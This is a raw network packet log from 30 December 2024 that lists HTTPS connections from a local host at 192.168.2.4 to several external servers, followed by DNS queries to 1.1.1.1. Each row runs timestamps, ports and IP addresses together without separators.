                                                                  Dec 30, 2024 22:42:44.417264938 CET58531443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:44.655745029 CET58531443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:44.655777931 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:45.019962072 CET44358527188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:45.020061016 CET44358527188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:45.020113945 CET58527443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:45.034929991 CET44358528188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:45.034998894 CET44358528188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:45.035062075 CET58528443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:45.254904032 CET44358529188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:45.255176067 CET44358529188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:45.255247116 CET58529443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:45.351377010 CET58527443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:45.351408958 CET44358527188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:45.355138063 CET58528443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:45.355195045 CET44358528188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:45.356273890 CET58529443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:45.356291056 CET44358529188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:52.678555012 CET58532443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:52.678603888 CET44358532188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:52.678711891 CET58532443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:52.679836035 CET58532443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:52.679851055 CET44358532188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:53.136609077 CET44358532188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:53.149194956 CET58532443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:53.149209023 CET44358532188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:53.149487972 CET44358532188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:53.178980112 CET58532443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:53.179037094 CET44358532188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:53.179663897 CET58532443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:53.179678917 CET58532443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:53.179687023 CET44358532188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:53.737412930 CET44358532188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:53.737498999 CET44358532188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:53.737551928 CET58532443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:53.739089012 CET58532443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:53.739101887 CET44358532188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:53.794008970 CET58533443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:53.794044971 CET44358533188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:53.794140100 CET58533443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:53.794444084 CET58533443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:53.794459105 CET44358533188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.247107029 CET44358533188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.247517109 CET58533443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.247528076 CET44358533188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.248394966 CET44358533188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.248558998 CET58533443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.248843908 CET58533443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.248862982 CET58533443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.248900890 CET44358533188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.248922110 CET58533443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.248960972 CET58533443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.249274015 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.249371052 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.249479055 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.249674082 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.249708891 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.734019041 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.734261990 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.734297991 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.735196114 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.735274076 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.735594988 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.735665083 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.735711098 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.778095007 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.778114080 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.825172901 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.869313002 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.869385004 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.869426966 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.869458914 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.869483948 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.869568110 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.869568110 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.869592905 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.869652033 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.869894028 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.869939089 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.869991064 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.870006084 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.870026112 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:54.870081902 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.870592117 CET58534443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:54.870620012 CET44358534188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:04.625919104 CET58556443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:04.625948906 CET44358556188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:04.626019001 CET58556443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:04.626678944 CET58556443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:04.626693010 CET44358556188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:05.079581022 CET44358556188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:05.079935074 CET58556443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:05.079956055 CET44358556188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:05.080245972 CET44358556188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:05.080629110 CET58556443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:05.080688000 CET44358556188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:05.080807924 CET58556443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:05.080832958 CET44358556188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:05.080840111 CET58556443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:05.123342991 CET44358556188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:05.564702988 CET44358556188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:05.564790964 CET44358556188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:05.564938068 CET58556443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:05.566411018 CET58556443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:05.566437006 CET44358556188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:06.089180946 CET58565443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:06.089221001 CET44358565188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:06.089298010 CET58565443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:06.089576006 CET58565443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:06.089589119 CET44358565188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:06.543716908 CET44358565188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:06.544611931 CET58565443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:06.544625044 CET44358565188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:06.545490026 CET44358565188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:06.545598030 CET58565443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:06.546061039 CET58565443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:06.546086073 CET58565443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:06.546116114 CET44358565188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:06.546137094 CET58565443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:06.546166897 CET58565443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:06.546412945 CET58571443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:06.546433926 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:06.546499968 CET58571443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:06.546710968 CET58571443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:06.546721935 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.026849031 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.027128935 CET58571443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:07.027143955 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.027430058 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.027725935 CET58571443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:07.027776003 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.027849913 CET58571443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:07.071332932 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.159224987 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.159337044 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.159368038 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.159382105 CET58571443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:07.159389019 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.159429073 CET58571443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:07.159435987 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.160048962 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.160094976 CET58571443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:07.160100937 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.160490036 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.160527945 CET58571443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:07.160533905 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.160573006 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:07.160613060 CET58571443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:07.160659075 CET58571443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:07.160669088 CET44358571188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:14.265260935 CET58618443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:43:14.265286922 CET44358618142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:43:14.265350103 CET58618443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:43:14.265645981 CET58618443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:43:14.265657902 CET44358618142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:43:14.913774014 CET44358618142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:43:14.914021969 CET58618443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:43:14.914035082 CET44358618142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:43:14.914304018 CET44358618142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:43:14.914576054 CET58618443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:43:14.914621115 CET44358618142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:43:14.964335918 CET58618443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:43:16.372579098 CET58634443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:16.372596025 CET4435863435.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.372653008 CET58634443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:16.375322104 CET58634443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:16.375332117 CET4435863435.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.378681898 CET58635443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:16.378751993 CET4435863535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.378874063 CET58635443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:16.381424904 CET58635443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:16.381452084 CET4435863535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.839334011 CET4435863435.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.863709927 CET4435863535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.887301922 CET58634443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:16.892891884 CET58634443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:16.892896891 CET4435863435.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.893219948 CET4435863435.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.894397020 CET58640443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:16.894443035 CET44358640188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:16.894500017 CET58640443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:16.894644976 CET58635443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:16.894674063 CET4435863535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.895205021 CET58634443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:16.895267963 CET4435863435.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.895697117 CET4435863535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.895761967 CET58635443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:16.896018982 CET58640443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:16.896047115 CET44358640188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:16.896819115 CET58635443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:16.896898031 CET4435863535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.896912098 CET58634443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:16.897103071 CET58635443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:16.897125959 CET4435863535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.939327955 CET4435863435.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:16.950735092 CET58635443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.021563053 CET4435863435.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.021769047 CET4435863435.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.021778107 CET58634443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.021787882 CET4435863435.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.021816969 CET58634443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.021842957 CET58634443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.022228956 CET58642443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.022272110 CET4435864235.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.022347927 CET58642443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.022521019 CET58642443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.022547960 CET4435864235.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.023288012 CET4435863535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.023346901 CET4435863535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.023406029 CET58635443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.023461103 CET58635443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.023483038 CET4435863535.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.023508072 CET58635443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.023530960 CET58635443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.023904085 CET58643443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.023916006 CET4435864335.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.023961067 CET58643443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.024123907 CET58643443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.024137020 CET4435864335.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.372740984 CET44358640188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:17.373006105 CET58640443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:17.373020887 CET44358640188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:17.373344898 CET44358640188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:17.373631954 CET58640443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:17.373687983 CET44358640188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:17.373781919 CET58640443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:17.373794079 CET58640443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:17.373816013 CET44358640188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:17.475536108 CET4435864235.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.475821972 CET58642443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.475851059 CET4435864235.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.476150036 CET4435864235.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.476468086 CET58642443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.476536036 CET4435864235.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.476598978 CET58642443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.476703882 CET58642443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.476733923 CET4435864235.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.505826950 CET4435864335.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.506031036 CET58643443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.506050110 CET4435864335.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.506371021 CET4435864335.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.506707907 CET58643443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.506763935 CET4435864335.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.506814003 CET58643443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.506840944 CET58643443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.506869078 CET4435864335.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.606302023 CET4435864235.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.606378078 CET4435864235.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.606431961 CET58642443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.606718063 CET58642443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.606745005 CET4435864235.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.638389111 CET4435864335.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.638448954 CET4435864335.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.638509035 CET58643443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.638627052 CET58643443192.168.2.435.190.80.1
                                                                  Dec 30, 2024 22:43:17.638638020 CET4435864335.190.80.1192.168.2.4
                                                                  Dec 30, 2024 22:43:17.967839956 CET44358640188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:17.967932940 CET44358640188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:17.968029022 CET58640443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:17.968933105 CET58640443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:43:17.968949080 CET44358640188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:43:17.973429918 CET58649443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:17.973505974 CET44358649188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:17.973582029 CET58649443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:17.973882914 CET58649443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:17.973923922 CET44358649188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:18.456350088 CET44358649188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:18.456656933 CET58649443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:18.456695080 CET44358649188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:18.457560062 CET44358649188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:18.457765102 CET58649443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:18.457993031 CET58649443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:18.458051920 CET58649443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:18.458051920 CET58649443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:18.458079100 CET44358649188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:18.458139896 CET58649443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:18.458367109 CET58653443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:18.458379984 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:18.458441019 CET58653443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:18.458640099 CET58653443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:18.458651066 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:18.926425934 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:18.926672935 CET58653443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:18.926681042 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:18.927541018 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:18.927603960 CET58653443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:18.927937031 CET58653443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:18.927987099 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:18.928080082 CET58653443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:18.928083897 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:18.982489109 CET58653443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:19.051539898 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:19.051598072 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:19.051651001 CET58653443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:19.051661968 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:19.051748991 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:19.051801920 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:19.051805019 CET58653443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:19.051810026 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:19.051851034 CET58653443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:19.051855087 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:19.052078962 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:19.052124023 CET58653443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:19.052128077 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:19.052216053 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:19.052257061 CET58653443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:19.053143978 CET58653443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:43:19.053153038 CET44358653188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:43:24.832808971 CET44358618142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:43:24.832854033 CET44358618142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:43:24.832901001 CET58618443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:43:26.783845901 CET58618443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:43:26.783854008 CET44358618142.250.186.132192.168.2.4
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 30, 2024 22:42:10.236094952 CET53581901.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:10.295716047 CET53601141.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:11.343481064 CET53541981.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:14.205156088 CET6163353192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:14.205296993 CET5355253192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:14.211935043 CET53535521.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:14.212524891 CET53616331.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:15.674926996 CET6434053192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:15.675173998 CET5961953192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:15.687344074 CET53643401.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:15.709697008 CET53596191.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:16.358761072 CET5954153192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:16.359158993 CET5248753192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:16.365602970 CET53595411.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:16.365928888 CET53524871.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:17.368752956 CET5150953192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:17.368752956 CET5361853192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:17.382975101 CET53536181.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:17.388881922 CET5040153192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:17.389431000 CET5207253192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:17.395664930 CET53504011.1.1.1192.168.2.4
